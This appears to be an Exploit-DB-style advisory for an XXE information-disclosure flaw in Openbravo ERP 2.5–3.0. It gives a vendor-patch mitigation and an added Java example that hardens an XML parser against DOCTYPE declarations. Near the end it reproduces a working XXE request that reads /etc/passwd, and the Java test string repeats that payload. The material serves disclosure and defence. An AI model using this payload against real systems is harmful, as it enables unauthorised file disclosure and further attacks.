Vendor: ERP
By: SecurityFocus
CVSS: 7.5 (HIGH)
Type: Information Disclosure
CWE: 200
Product Name: ERP
Affected Version From: 2.5
Affected Version To: 3.0
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Openbravo ERP Information Disclosure Vulnerability

Openbravo ERP is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. The vulnerability exists due to the application failing to properly sanitize user-supplied input. An attacker can exploit this issue by sending a specially crafted XML request containing an external entity declaration. This may allow the attacker to view arbitrary files on the affected computer.

Mitigation:

Users should apply the patch from the vendor's website.
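
Independently of the vendor patch, this class of bug is closed by configuring the XML parser to refuse DOCTYPE declarations, so an external entity can never be declared or resolved. The Java below is an added example, not Openbravo's code or the vendor's patch; it assumes the request body is parsed through the JDK's JAXP `DocumentBuilderFactory` (the page does not say which parser Openbravo uses), and the class name, method names and sample bodies are constructed for illustration.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class HardenedXmlParse {

    // JAXP factory configured so a request body cannot declare or resolve entities.
    static DocumentBuilder hardenedBuilder() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Reject any document that carries a DOCTYPE; this alone stops the
        // external-entity request this advisory describes.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case the DOCTYPE ban is ever relaxed.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        f.setNamespaceAware(true);
        return f.newDocumentBuilder();
    }

    // Returns the <comments> text, or null when the parser refuses the document.
    static String parseComments(String body) throws Exception {
        try {
            Document d = hardenedBuilder().parse(new InputSource(new StringReader(body)));
            return d.getElementsByTagName("comments").item(0).getTextContent();
        } catch (SAXParseException e) {
            System.err.println("rejected: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        String root = "<ob:Openbravo xmlns:ob=\"http://www.example.com\"><Product>";
        String tail = "</Product></ob:Openbravo>";
        // Constructed sample bodies modelled on the request shown on this page.
        String plain = root + "<comments>fresh stock</comments>" + tail;
        String withDoctype = "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>"
                + root + "<comments>&xxe;</comments>" + tail;
        System.out.println("plain   -> " + parseComments(plain));
        System.out.println("doctype -> " + parseComments(withDoctype));
    }
}
```

Rejected documents are also worth logging on the server side: a DOCTYPE in a REST request body is unusual for a legitimate client and is a useful detection signal.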
Exploit-DB raw data:

source: https://www.securityfocus.com/bid/63431/info

Openbravo ERP is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

Openbravo ERP 2.5 and 3.0 are vulnerable. 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
 <!ELEMENT comments ANY >
 <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>

<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
        <Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
                <id>C970393BDF6C43E2B030D23482D88EED</id>
                <comments>&xxe;</comments>
        </Product>
</ob:Openbravo>